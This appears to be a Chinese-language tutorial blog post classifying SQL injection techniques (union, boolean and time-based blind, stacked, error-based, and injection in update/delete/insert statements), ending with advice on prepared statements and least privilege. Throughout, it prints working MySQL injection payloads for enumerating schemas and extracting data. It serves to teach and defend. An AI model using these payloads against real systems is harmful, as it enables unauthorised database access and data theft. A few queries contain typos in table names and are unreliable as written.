SQL注入类型详解
SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔盲注、时间盲注、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。
判断注入是否存在
and 1=1,and 1=2 返回页面数据不同
?id=3-1,返回数据内容不同
添加’、""以及其他特殊符号报错
…
联合注入
前提要求:数据会进行回显,页面有显位符,在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位
在判断注入点是否存在后,首先可以使用联合查询判断当前数据库类型、版本信息以便于进一步进行注入
因为联合查询要求两个语句所查询的字段数与类型需要一致,因此,在进行联合查询之前首先应当判断查询语句中涉及的字段数为多少,使用order by 字段加数字的方法进行测试,order by 原本用来对查询结果进行排序,后面跟上的字段或者数字表示根据那一列来进行排序,若超出结果,则会进行报错,因此可以判断出原本查询中涉及多少个字段。
select * from user where id=1 order by 5;
1
判断列数之后,可以首先判断该网站数据库类型,版本等信息进行进一步的注入,因为程序在获取返回数据时,有时只会获取第一列返回内容,这时,我们便需要在id出填入根本查询不出内容的数值或者字符,使得程序返回我们需要的结果
以下实验以mysql 为例。
查询数据库名
select * from user where id =1 union select 1, schema_name from infornamtion_schema.schemata;
1
查询某个数据库中的表名
select * from user where id=1 union select 1,table_name from information_schema.tables where table_schema="test";
1
查询student 中的字段名
select * from user where id =1 union select 1,column_name from information_schema.columns where table_schema="test" and table_name="student";
1
查询student 表中的内容,限制返回行数时,使用limit一行行单个的取值,也结合使用concat 同时取多个字段的值。
布尔盲注
布尔为计算机中的一种数据类型,分为true、False两种类型,盲注则是表示注入过程中数据不会回显,只能根据页面返回两种内容的的不同来判断注入语句判断的内容是否正确。
在布尔盲注中通常需要使用连接符号and、or等字符来连接两个字符串,根据上面联合注入的步骤
布尔盲注时的语句结构
select * from user where id= 1 and (select substr((select schema_name from information_schema.schemata limit 1,1),1,1)="m");
1
首先查询数据库名,
select schema_name from information_schame.schemata limit 1,1;
1
可以见到查询结果为mysql,下面将使用布尔盲注的方法对那个字段进行猜解
首先猜解之前应当判断内容的长度
下面对mysql 对局库每个字段进行猜解,猜解错是不返回内容
猜解正确是返回内容,
可能页面返回内容不是根据数据是否回显来判断,但是正确与错误总会存在不同。
之后根据步骤一步步进行猜解即可,猜解内容时若是遇到单双引号过滤的情况,可以使用ord(),ascii()进行ascii转码之后再进行猜解。
错误
正确
时间盲注
时间类型的盲注本质是利用插入的SQL语句执行造成时间延迟;在猜解正确或者失败时执行造成时间延迟的语句,辅助判断是否内容猜解正确。
常用sql盲注时造成时延的方法
sleep()
benchmark()
笛卡尔积
get_lock()函数
sleep()使用
sleep()函数造成时间延迟十分简单,直接在函数中填写响应的秒数即可,如sleep(5);
benchmark()使用
用法benchmark(count,expr),会重复计算expr表达式count次,通过这种方式就可以评估出mysql执行这个expr表达式的效率。多次执行即可造成时间延迟
笛卡尔积
具体的方式就是将简单的表查询不断的叠加,使之以指数倍运算量的速度增长,不断增加系统执行 sql 语句的负荷,直到产生攻击者想要的时间延迟,这就非常的类似于 dos 这个系统,由于每个数据库的数据量差异较大,并且有着自己独特的表与字段,所以为了使用这种方式发起攻击,我们不能依赖于不同数据库的特性而是要依赖于数据库的共性,也就是利用系统自带的表和字段来完成攻击,下面是一个能够在 SQL SERVER 和 MYSQL 中成功执行的模板
SELECT count(*) FROM information_schema.columns A,information_schema.columns B,information_schema.columns C;
1
根据数据库查询的特点,这句话的意思就是将 A B C 三个表进行笛卡尔积(全排列),并输出 最终的行数
get_lock()函数使用限制条件
连续使用两次get_lock(str,time),若是第一次执行成功,那个第二次将延时对应填写的时间。
限制条件就是数据库的连接必须是持久连接,我们知道 mysql_connect() 连接数据库后开始查询,然后调用 mysql_close() 关闭与数据库的连接,也就是 web 服务器与数据库服务器连接的生命周期就是整个脚本运行的生命周期,脚本结束连接即断开,但是很明显这里我们要利用的是前一个连接对后一个连接的阻碍作用导致延时,所以这里的连接必须是持久的。
时间盲注实战。
在时间盲注中,需要一个sql语句的结果能够在猜解正确或者错误是执行延时方法来验证,可以使用 and、or ,也可以使用if()函数来进行时间盲注,还可以使用elt()函数来做时间盲注,但是过程可能要更过复杂。
and 与 or
select * from user where id =1 and (select substr((select database()),1,1)="t") and sleep(5);
select * from user where id =1 and (substr((select database()),1,1)="t") and sleep(5); //这样也行
1
2
使用and 与 or的主要根据就是他俩的逻辑
and X and sleep(3) //若X 为假则不会执行,为真则执行sleep()函数
or X or sleep(3) //若X 为真则不会执行,为加则执行sleep()函数
1
2
3
if 函数的使用较未加单
if(x,真,假)
select * from user where id =1 and if(SUBSTR((select database()),1,1)="t",sleep(3),1);
1
2
sleep(),多种方法嵌套到上面提到的格式中
select * from user where id =1 and if(SUBSTR((select database()),1,1)="t",sleep(3),1);
1
benchmark()
benchmark(100000,sha(1))
1
笛卡尔积
SELECT count(*) FROM information_schema.columns A,information_schema.columns B,information_schema.columns C;
1
get_lock()
X and get_lock('th1e',5);%23
X and get_lock('th1e',1);%23
1
2
堆叠注入
堆叠注入的使用条件十分有限,其可能受到 API 或者数据库引擎,又或者权限的限制只有 当调用数据库函数支持执行多条 sql 语句时才能够使用,利用 mysqli_multi_query()函数就支持多条 sql 语句同时执行,但实际情况中,如 PHP 为了防止 sql 注入机制,往往使用调用数据库的函数是 mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所 以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。
堆叠注入即多语句注入,格式如下
select * from user where id = 1;select database();
1
报错注入
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用,目前对于各种不同类型数据库,不同版本数据库报错注入时可能并不能通用,常用可以通用的报错注入的方式有两种,xpath注入和主键重复导致的报错
xpath报错注入
xpath报错注入主要依赖于两个函数extractvalue(),updatexml()这两个函数的主要作用是对xml文档进行操作。版本限制mysql5.1.5以及之后。
extractvalue()
语法:extractvalue(文档,路径)
select name from user where id =1 and extractvalue('1',concat('~',(select database())));
1
updatexml()除了语法与extractvalue()略有不同外,使用方法基本相同
语法 updatexml(文档,路径,更新的内容)
主键重复报错注入
count()和group by在遇到rand()产生的重复值时报错,具体解释可以参考https://xz.aliyun.com/t/253,
select count(*) from user group by concat(version(),floor(rand(0)*2));
1
按照查询类型分类
按照另一种分类方式,sql注入又可以分为,数字型注入、字符型注入和搜索型注入,当注入点的值原本为整数等数值是,这时的注入为数字型注入,注入点数据为被引号包裹的字符串时,这时的注入则为字符型注入,搜索型注入其原形大致为:select * from 表名 where 字段 like ‘%关键字%’
其他类型的注入方式
目前主要测试注入时均是对查询型进行测试,其中删除、更新、插入数据时注入练习较少,所以也写一下。
update 注入
update user set name ="go" where name="" and updatexml(1,concat('~',(select version())),1);
1
delete 注入
DELETE from user where id =6 and X;//x 代表注入的语句。
1
insert 注入
报错注入出数据
insert into user(id,name) values(6,"" or updatexml('1',concat('~',(select database())),1) or "");
insert into user(id,name) values(6,"X") or "");//x代表语句,使用updatexml 时则可以嵌套sql语句
1
2
修复方式
预编译
安全函数的使用
最低权限原则
关闭数据库错误回显
用户输入内容判断
预编译可以预防sql注入的原因
预编译可以防止sql注入的原因是:采用了预编译,程序就会将sql语句:“select id, no from user where id=?” 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该sql语句的 语法结构了,因为语法分析已经完成了,而语法分析主要是分析sql命令,比如 select ,from ,where ,and, or ,order by 等等。所以即使你后面输入了这些sql命令,也不会被当成sql命令来执行了,因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,只会被当做字符串字面值参数。所以sql语句预编译可以防御sql注入。
若有错误,请各位斧正。
参考
https://www.cnblogs.com/SCHAOGES/p/10889654.html
https://www.anquanke.com/post/id/170626
https://bealright.github.io/2019/07/25/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/
https://zhuanlan.zhihu.com/p/35245598
https://cloud.tencent.com/developer/article/1631808 https://blog.csdn.net/whatday/article/details/63683187
https://blog.csdn.net/weixin_42277564/article/details/80583959
https://www.cnblogs.com/digdeep/p/4715245.html
